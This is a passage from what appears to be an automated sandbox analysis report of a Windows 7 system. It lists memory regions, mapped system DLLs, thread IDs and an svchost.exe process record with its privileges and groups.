"c:\\windows\\system32\\wbemcomn.dll") Region: id = 1815 start_va = 0x7fefd3b0000 end_va = 0x7fefd48afff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1816 start_va = 0x7fefd490000 end_va = 0x7fefd49dfff entry_point = 0x7fefd490000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1817 start_va = 0x7fefd4a0000 end_va = 0x7fefd568fff entry_point = 0x7fefd4a0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1818 start_va = 0x7fefe300000 end_va = 0x7fefe32dfff entry_point = 0x7fefe300000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1819 start_va = 0x7fefe330000 end_va = 0x7fefe396fff entry_point = 0x7fefe330000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1820 start_va = 0x7fefe3a0000 end_va = 0x7fefe3a7fff entry_point = 0x7fefe3a0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1821 start_va = 0x7fefe810000 end_va = 0x7fefea12fff entry_point = 0x7fefe810000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1822 start_va = 0x7fefebf0000 end_va = 0x7fefecf8fff entry_point = 0x7fefebf0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1823 start_va = 0x7fefef80000 end_va = 0x7feff01efff entry_point = 0x7fefef80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1824 start_va = 0x7feff020000 end_va = 0x7feff03efff entry_point = 0x7feff020000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1825 start_va = 0x7feff040000 end_va = 0x7feff08cfff entry_point = 0x7feff040000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1826 start_va = 0x7feff090000 end_va = 0x7feff1bcfff entry_point = 0x7feff090000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1827 start_va = 0x7feff1c0000 end_va = 0x7feff296fff entry_point = 0x7feff1c0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1992 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000f0000" filename = "" Region: id = 1993 start_va = 0x350000 end_va = 0x350fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1994 start_va = 0x7f0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000007f0000" filename = "" Region: id = 1995 start_va = 0x890000 end_va = 0x90ffff entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 1996 start_va = 0x920000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 1997 start_va = 0xa10000 end_va = 0xa8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1998 start_va = 0xaa0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 1999 start_va = 0xb20000 end_va = 0xdeefff entry_point = 0xb20000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2000 start_va = 0xe80000 end_va = 0xefffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 2001 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2002 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2003 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 2004 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2005 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2006 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2007 start_va = 0x7fefced0000 end_va = 0x7fefcedefff entry_point = 0x7fefced0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2008 start_va = 0x7fefcfc0000 end_va = 0x7fefcfd3fff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 2009 start_va = 0x7fefeb50000 end_va = 0x7fefebe8fff entry_point = 0x7fefeb50000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2010 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 2011 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 2012 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 2013 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 2014 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 119 os_tid = 0x760 Thread: id = 120 os_tid = 0x670 Thread: id = 141 os_tid = 0xa20 Thread: id = 142 os_tid = 0x320 Thread: id = 143 os_tid = 0x578 Thread: id = 144 os_tid = 0x934 Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x9bca000" os_pid = "0x2c8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "5" os_parent_pid = "0x35c" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000aa9b" [0xc000000f], "LOCAL" [0x7] Region: id = 1828 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1829 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1830 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1831 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1832 start_va = 0x50000 end_va = 0x51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1833 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1834 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1835 start_va = 0x80000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1836 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 1837 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 1838 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 1839 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1840 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 1841 start_va = 0x3a0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1842 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 1843 start_va = 0x3f0000 end_va = 0x577fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1844 start_va = 0x580000 end_va = 0x700fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1845 start_va = 0x710000 end_va = 0x7cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 1846 start_va = 0x7d0000 end_va = 0xbc2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 1847 start_va = 0xbd0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1848 start_va = 0xbf0000 end_va = 0xc0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000bf0000" filename = "" Region: id = 1849 start_va = 0xc10000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c10000" filename = "" Region: id = 1850 start_va = 0xc90000 end_va = 0xc90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c90000" filename = "" Region: id = 1851 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 1852 start_va = 0xcb0000 end_va = 0xd2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1853 start_va = 0xd30000 end_va = 0xd30fff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 1854 start_va = 0xd40000 end_va = 0xd40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d40000" filename = "" Region: id = 1855 start_va = 0xd50000 end_va = 0xdcffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 1856 start_va = 0xdd0000 end_va = 0xe4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 1857 start_va = 0xe50000 end_va = 0xe51fff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 1858 start_va = 0xe60000 end_va = 0xe60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 1859 start_va = 0xe70000 end_va = 0xe72fff entry_point = 0xe70000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 1860 start_va = 0xe80000 end_va = 0xe81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e80000" filename = "" Region: id = 1861 start_va = 0xe90000 end_va = 0xe90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 1862 start_va = 0xea0000 end_va = 0xea0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ea0000" filename = "" Region: id = 1863 start_va = 0xf00000 end_va = 0x11cefff entry_point = 0xf00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1864 start_va = 0x11d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 1865 start_va = 0x1300000 end_va = 0x1307fff entry_point = 0x0 region_type = private name = "private_0x0000000001300000" filename = "" Region: id = 1866 start_va = 0x13b0000 end_va = 0x142ffff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 1867 start_va = 0x1470000 end_va = 0x14effff entry_point = 0x0 region_type = private name = "private_0x0000000001470000" filename = "" Region: id = 1868 start_va = 0x15c0000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 1869 start_va = 0x1640000 end_va = 0x16a1fff entry_point = 0x1640000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1870 start_va = 0x16d0000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x00000000016d0000" filename = "" Region: id = 1871 start_va = 0x1770000 end_va = 0x17effff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 1872 start_va = 0x1880000 end_va = 0x197ffff entry_point = 0x0 region_type = private name = "private_0x0000000001880000" filename = "" Region: id = 1873 start_va = 0x19d0000 end_va = 0x1a4ffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 1874 start_va = 0x1a90000 end_va = 0x1b0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 1875 start_va = 0x1b40000 end_va = 0x1bbffff entry_point = 0x0 region_type = private name = "private_0x0000000001b40000" filename = "" Region: id = 1876 start_va = 0x1bf0000 end_va = 0x1c6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001bf0000" filename = "" Region: id = 1877 start_va = 0x1c70000 end_va = 0x1ceffff entry_point = 0x0 region_type = private name = "private_0x0000000001c70000" filename = "" Region: id = 1878 start_va = 0x1d50000 end_va = 0x1dcffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1879 start_va = 0x1dd0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001dd0000" filename = "" Region: id = 1880 start_va = 0x1fd0000 end_va = 0x23cffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 1881 start_va = 0x23e0000 end_va = 0x245ffff entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 1882 start_va = 0x2460000 end_va = 0x24dffff entry_point = 0x0 region_type = private name = "private_0x0000000002460000" filename = "" Region: id = 1883 start_va = 0x2560000 end_va = 0x2962fff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 1884 start_va = 0x2ab0000 end_va = 0x32affff entry_point = 0x0 region_type = private name = "private_0x0000000002ab0000" filename = "" Region: id = 1885 start_va = 0x32b0000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x00000000032b0000" filename = "" Region: id = 1886 start_va = 0x3390000 end_va = 0x340ffff entry_point = 0x0 region_type = private name = "private_0x0000000003390000" filename = "" Region: id = 1887 start_va = 0x3410000 end_va = 0x350ffff entry_point = 0x0 region_type = private name = "private_0x0000000003410000" filename = "" Region: id = 1888 start_va = 0x3520000 end_va = 0x359ffff entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 1889 start_va = 0x35b0000 end_va = 0x362ffff entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 1890 start_va = 0x3640000 end_va = 0x36bffff entry_point = 0x0 region_type = private name = "private_0x0000000003640000" filename = "" Region: id = 1891 start_va = 0x73a20000 end_va = 0x73a22fff entry_point = 0x73a20000 region_type = mapped_file name = "winmgmtr.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" (normalized: "c:\\windows\\system32\\wbem\\winmgmtr.dll") Region: id = 1892 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x76e70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1893 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x76f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1894 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1895 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1896 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1897 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1898 start_va = 0xff160000 end_va = 0xff1c1fff entry_point = 0xff160000 region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" (normalized: "c:\\windows\\system32\\winlogon.exe") Region: id = 1899 start_va = 0xff4d0000 end_va = 0xff4dafff entry_point = 0xff4d0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1900 start_va = 0xffcb0000 end_va = 0xffd02fff entry_point = 0xffcb0000 region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" (normalized: "c:\\windows\\system32\\services.exe") Region: id = 1901 start_va = 0x7fee2520000 end_va = 0x7fee25cdfff entry_point = 0x7fee2520000 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 1902 start_va = 0x7fee25d0000 end_va = 0x7fee26f4fff entry_point = 0x7fee25d0000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1903 start_va = 0x7fef15a0000 end_va = 0x7fef15bbfff entry_point = 0x7fef15a0000 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 1904 start_va = 0x7fef3670000 end_va = 0x7fef36befff entry_point = 0x7fef3670000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1905 start_va = 0x7fef5740000 end_va = 0x7fef5753fff entry_point = 0x7fef5740000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1906 start_va = 0x7fef5a40000 end_va = 0x7fef5a4efff entry_point = 0x7fef5a40000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1907 start_va = 0x7fef5a50000 end_va = 0x7fef5a76fff entry_point = 0x7fef5a50000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1908 start_va = 0x7fef5a80000 end_va = 0x7fef5b61fff entry_point = 0x7fef5a80000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1909 start_va = 0x7fef5bb0000 end_va = 0x7fef5c35fff entry_point = 0x7fef5bb0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1910 start_va = 0x7fefa070000 end_va = 0x7fefa08afff entry_point = 0x7fefa070000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1911 start_va = 0x7fefaa40000 end_va = 0x7fefaa57fff entry_point = 0x7fefaa40000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1912 start_va = 0x7fefaa60000 end_va = 0x7fefaa70fff entry_point = 0x7fefaa60000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1913 start_va = 0x7fefab20000 end_va = 0x7fefab5afff entry_point = 0x7fefab20000 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1914 start_va = 0x7fefab60000 end_va = 0x7fefabb0fff entry_point = 0x7fefab60000 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1915 start_va = 0x7fefabd0000 end_va = 0x7fefabd7fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 1916 start_va = 0x7fefabe0000 end_va = 0x7fefabeafff entry_point = 0x7fefabe0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1917 start_va = 0x7fefabf0000 end_va = 0x7fefac16fff entry_point = 0x7fefabf0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1918 start_va = 0x7fefac20000 end_va = 0x7fefac29fff entry_point = 0x7fefac20000 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1919 start_va = 0x7fefb0c0000 end_va = 0x7fefb0c8fff entry_point = 0x7fefb0c0000 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1920 start_va = 0x7fefb0d0000 end_va = 0x7fefb0fbfff entry_point = 0x7fefb0d0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1921 start_va = 0x7fefb100000 end_va = 0x7fefb1abfff entry_point = 0x7fefb100000 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 1922 start_va = 0x7fefb1b0000 end_va = 0x7fefb1dcfff entry_point = 0x7fefb1b0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1923 start_va = 0x7fefb200000 end_va = 0x7fefb214fff entry_point = 0x7fefb200000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1924 start_va = 0x7fefb220000 end_va = 0x7fefb22bfff entry_point = 0x7fefb220000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1925 start_va = 0x7fefb520000 end_va = 0x7fefb56afff entry_point = 0x7fefb520000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 1926 start_va = 0x7fefb990000 end_va = 0x7fefbabbfff entry_point = 0x7fefb990000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1927 start_va = 0x7fefc000000 end_va = 0x7fefc195fff entry_point = 0x7fefc000000 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1928 start_va = 0x7fefc1a0000 end_va = 0x7fefc1abfff entry_point = 0x7fefc1a0000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1929 start_va = 0x7fefc1b0000 end_va = 0x7fefc26afff entry_point = 0x7fefc1b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1930 start_va = 0x7fefc270000 end_va = 0x7fefc276fff entry_point = 0x7fefc270000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1931 start_va = 0x7fefc360000 end_va = 0x7fefc37afff entry_point = 0x7fefc360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1932 start_va = 0x7fefc380000 end_va = 0x7fefc39dfff entry_point = 0x7fefc380000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1933 start_va = 0x7fefc4d0000 end_va = 0x7fefc4d9fff entry_point = 0x7fefc4d0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1934 start_va = 0x7fefc5d0000 end_va = 0x7fefc616fff entry_point = 0x7fefc5d0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1935 start_va = 0x7fefc6f0000 end_va = 0x7fefc74afff entry_point = 0x7fefc6f0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1936 start_va = 0x7fefc860000 end_va = 0x7fefc866fff entry_point = 0x7fefc860000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1937 start_va = 0x7fefc870000 end_va = 0x7fefc8c4fff entry_point = 0x7fefc870000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1938 start_va = 0x7fefc8d0000 end_va = 0x7fefc8e6fff entry_point = 0x7fefc8d0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1939 start_va = 0x7fefcb00000 end_va = 0x7fefcb6cfff entry_point = 0x7fefcb00000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1940 start_va = 0x7fefce70000 end_va = 0x7fefce7afff entry_point = 